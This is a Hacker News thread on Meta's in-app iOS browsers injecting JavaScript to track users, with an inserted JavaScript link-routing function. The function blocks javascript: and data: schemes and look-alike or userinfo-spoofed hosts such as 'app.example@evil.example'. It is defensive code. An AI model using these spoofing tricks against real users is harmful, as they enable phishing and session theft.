> If FB is supposed to follow iOS settings by opening links in the default browser set by the user, but is intentionally not doing that here so that they can maximize the data they collect, then yeah they'd be breaking rules.

Users can't set a default browser on iOS. Apps can choose to open URLs in one of two in-app webviews (the old WKWebView or the newer SafariViewController), or they can use the "universal links" option to allow the system to open a URL (which can be redirected to another native app, should one be available to handle the domain). While SafariViewController is more full-featured (it forces the use of the system default share control and shows the URL), a lot of sketchier apps prefer to use the older WKWebView (where they can better customize the UI, hide system default controls, and hide the URL). Since WKWebView hides the URL, you can somewhat transparently route users through tracking domains (something I already observed Twitter doing), which may also be the vector Meta is using to inject JS.

All this said, the visual customization of WKWebView also has a legitimate use: many apps use it for showing regular in-app screens, not just for an internal browser.

Well-made third-party apps (Tweetbot for Twitter, Apollo for Reddit) generally let the user choose between SVC or just letting the system handle the URL, because they're not interested in monetizing user data in the same way.


> Users can't set a default browser on iOS.

Yes they can, starting with iOS 14: https://support.apple.com/en-us/HT211336


That’s just the app itself, not the actual browser engine - under the hood it’s still WebKit (what Safari uses) and not Chrome or any other browser engine: https://en.m.wikipedia.org/wiki/WebKit#Use

iOS doesn’t allow anything other than WebKit webviews described above. Android does support others, but that’s a different story.


That's not what the question/context was -- it was specifically talking about which app (e.g. Safari, Chrome, Firefox, whatever) is used to open links from apps.

No clue why I was downvoted for saying that, which was a perfectly valid answer in that context.


I don't think there's any such rule. Tons of apps open things in their own browser instead of leaving the app.


I do wish there were such a rule, though, on both iOS and Android!


Thanks for clarifying! :)


The "in-app browser" is Safari, not their own rendering engine (Which is explicitly disallowed.) The difference between in-app safari and external...is that the app can get callbacks for every link tapped within the in-app browser, and the app itself can inject javascript into each web page it loads, which essentially means unlimited perfect tracking for social networks (Since the user is already logged in to the app.)

This sounds bad...but the integrated webview is necessary for things like Cordova/Ionic/React Native/etc to exist on the platform. It's also a byproduct of iOS's pre-multitasking days where launching out to Safari was a big context change, vs now where you can just swipe back to the app you were in.


You’re right but also note that React Native does not render in a WebView like Cordova. React Native renders native components.


“Instagram and Facebook can track anything you do on any website in their in-app browser”: https://news.ycombinator.com/item?id=32415470


Can Apple really enforce what goes on in an app? Probably only by rejecting it from the app store, but that's risky on Apple's part and would cause a lot of user complaints.


To a point; they control all the interfaces, which is why an app like Facebook cannot access your photos, location or address book without your explicit permission.

And Apple has gone for the nuclear option of removing apps from the store; not long ago they booted Fortnite, one of the big earners (billions in revenue of which Apple got a percentage through their commissions), after they added a means to circumvent the app store fees, starting a long proceeding into getting it lowered or dismissed entirely - partially successful in specific jurisdictions.


Apple should change the rules to reject apps that try to open links in an in-app browser instead of sending the user to Safari.

Maybe as a workaround let Meta put up their own browser on the app store and make it possible for a user to choose to let the FB app send links to the Meta browser for someone who really wants this behavior.

But don't allow the FB app to do this with no way for the user to stop it.

Chrome for iOS seems to exist for exactly the same reason, to provide a way for google to track users.


Facebook would just argue user experience - which is true, users do prefer to stay in the app. Users don’t really understand this behavior, however. I’m sure there have been users that have opened links in FB, then decided to go log into their bank on the same session.

If Apple were to address this, they might end up monitoring the in-app browser and prompting for the user to hop out into Safari depending on the URL. As of now, apps like FB discourage reopening sessions in Safari. The worst ones are like LinkedIn which requires like 2-3 key presses to reopen in Safari. It’s clear these apps have an incentive in keeping users within the in-app browser.


Very hard to implement. Many apps use web views for core functions. These shouldn't spawn full Safari
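The per-URL policy the last few comments go back and forth on, as an added example that is not the Facebook app's code nor anything from the article. A hybrid app (Cordova or React Native style, where the app logic is JavaScript) gets three choices for a link: its privileged embedded WKWebView, SFSafariViewController, or handing the URL to the system. The function below keeps the privileged view for the app's own https hosts, where the bridge is needed for core screens, and sends everything else out, so a bank login opened from a feed never lands in a view the app can script. `FIRST_PARTY_HOSTS`, the base URL and the return shape are assumptions for the example; the edge cases checked (suffix look-alikes, userinfo in the URL, non-web schemes, plaintext http) are the ones a reviewer would want covered.

```javascript
// Added example, not the Facebook app's code. FIRST_PARTY_HOSTS is assumed.
const FIRST_PARTY_HOSTS = ['app.example', 'help.example'];

// Exact match or a real subdomain: 'x.app.example' yes, 'notapp.example' no,
// 'app.example.evil.example' no.
function hostMatches(host, pattern) {
  return host === pattern || host.endsWith('.' + pattern);
}

// Returns { target: 'embedded' | 'system' | 'block', reason, url }.
//   embedded: the app's own WKWebView (can inject scripts, receive events)
//   system:   SFSafariViewController or the user's default browser; the app
//             sees nothing inside it
//   block:    do not open at all
function routeLink(rawUrl, firstPartyHosts = FIRST_PARTY_HOSTS, base = 'https://app.example/') {
  let u;
  try {
    u = new URL(rawUrl, base); // relative links resolve against the app's own origin
  } catch (e) {
    return { target: 'block', reason: 'unparseable URL', url: rawUrl };
  }
  if (u.protocol !== 'https:' && u.protocol !== 'http:') {
    // javascript:, data:, custom schemes: never hand these to any web view
    return { target: 'block', reason: 'scheme ' + u.protocol, url: u.href };
  }
  if (u.username || u.password) {
    // https://app.example@evil.example reads as first-party to a human
    return { target: 'block', reason: 'userinfo in URL', url: u.href };
  }
  const host = u.hostname.toLowerCase();
  const firstParty = firstPartyHosts.some((p) => hostMatches(host, p));
  if (firstParty && u.protocol === 'https:') {
    return { target: 'embedded', reason: 'first-party over https', url: u.href };
  }
  if (firstParty) {
    // Own host but plaintext: an embedded view that injects auth would leak it
    return { target: 'system', reason: 'first-party but not https', url: u.href };
  }
  return { target: 'system', reason: 'third-party', url: u.href };
}

// Example from an app's link handler:
// const r = routeLink(href);
// if (r.target === 'embedded') openInAppWebView(r.url);   // assumed app helper
// else if (r.target === 'system') openWithSystem(r.url);   // assumed app helper
```

The point of the split is that core screens keep working inside the app (the objection raised above) while the scriptable view is never pointed at someone else's login page; what the app can observe is bounded by the allowlist rather than by its restraint.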



I hate that Facebook has to abuse the freedom of injecting Javascript into WebViews. This is why we can't have nice things.

I fear that this will lead to an overreaction from Apple that results in blocking or severely limiting this feature, which will be a huge issue for apps that depend on it for legitimate reasons.


The abuse of Javascript is a longstanding tradition, far from unique to Facebook. It's why I don't allow JS to execute on my machines by default.


I saw an article recently where an FB spokesperson was arguing—albeit in an indirect, fluffily-phrased way—that in order to be able to only track you in the places X where they're allowed to and not the places Y they're not allowed to, they need to track you everywhere (X+Y) to know if you're in X. That way, presumably, they can be sure to not track you in X.

I gotta find that article again...


Wonder if similar lawsuits are going to happen in Europe, hopefully it happens here too and the fine is a % of the revenue, fuck f$ceb$$k.


Couldn't Apple's ATT be enforced at a technical level, giving poisoned information such as XPrivacy did in its heydays, or by preventing JS injection in webviews?


Eh, if they're going to do that I'd rather they just force developers to use normal Safari for external links. It'd be easier to verify and I'd get to finally keep my cookies and not log in to news sites for the 100th time.


Apple could still target specific endpoints deliberately for repeat offenders also in the normal Safari.

They could have a privacy feature (default on) which blocks or poisons specific endpoints on specific hosts belonging to e.g. Meta, Alphabet, ByteDance.

Apple are in a unique position here to protect users' privacy since they control the browser of so many. It's unfortunate that they also have their own advertising agenda so any steps they take will always be scrutinized as being anti competitive and simply making their own ads more profitable. But I'd still want Apple to pull the trigger on more drastic measures like these. The last round of privacy isolation should just be the start. I'd love to see Apple e.g. block Facebook ads inside the Facebook app and refer to privacy concerns and only unblock them if Meta follows all privacy guidelines elsewhere.


> It's unfortunate that they also have their own advertising agenda so any steps they take will always be scrutinzed as being anti competitive

Right? If they actually cared about privacy they’d forego revenue for it. Sadly it’s just for marketing.


Preventing JS injection would make lots of legitimate use cases impossible. I really hope Apple doesn't punish all developers for Facebook's actions.


lol Facebook is shameless


Let me get this straight, they are serial offenders and apparently incapable of even realizing that they're doing wrong. Any non-rich person would at least end up in psychiatric care for something like that, but we let these psychopaths run free?


They put all the blame on the company, which is legally considered a person that can't go to jail (because it isn't a person).



If you're rich, it's just called 'eccentric'.


I like this. This is competition. Apple is drawing Facebook out. I like both companies but the incentives of any trillion-dollar company are very fucked and it helps Facebook internally when they get sued for breaking the rules. Let he without sin cast the first stone, everybody breaks some rule at some point, it's original sin and inescapable. Even saints sin, they just also atone. This helps Facebook's angels on its shoulder speak up with bigger numbers--which is the name of the game--and drown out the devil on the left. Like wouldn't it be good for--extreme example--Judas if he put a price of thirty pieces of silver against betraying Jesus? That mitigates temptation.

Slaps on the wrist are harmful especially for those receiving slaps on the wrist. No moral development.

How does this apply to a FAANG company? Nobody knows--better than another FAANG company. Yes they know each other yes they hire each other's employees yes cross-pollination yes yes yes--but they also compete. And when they hold back on competition, they at least do the public the favor of doing so at a very high cost--like Apple taking $20,000,000,000 from Google in exchange for not entering the search engine market. So there the higher the price extolled, the better for the public. The higher the price, the harder for Google to pay it to avoid competition, and the more likely it will not be paid which leads to competition.

In practice every FAANG company competes against all the others on everything. This is a success! Google can't beat Apple on smartphones, and Apple can't beat Google on search (even if they wanted to), so both companies have money, so they duke it out in every battleground beyond their moat. If they don't have a moat, however, they go to shit and can't carry out that competition in every other field.

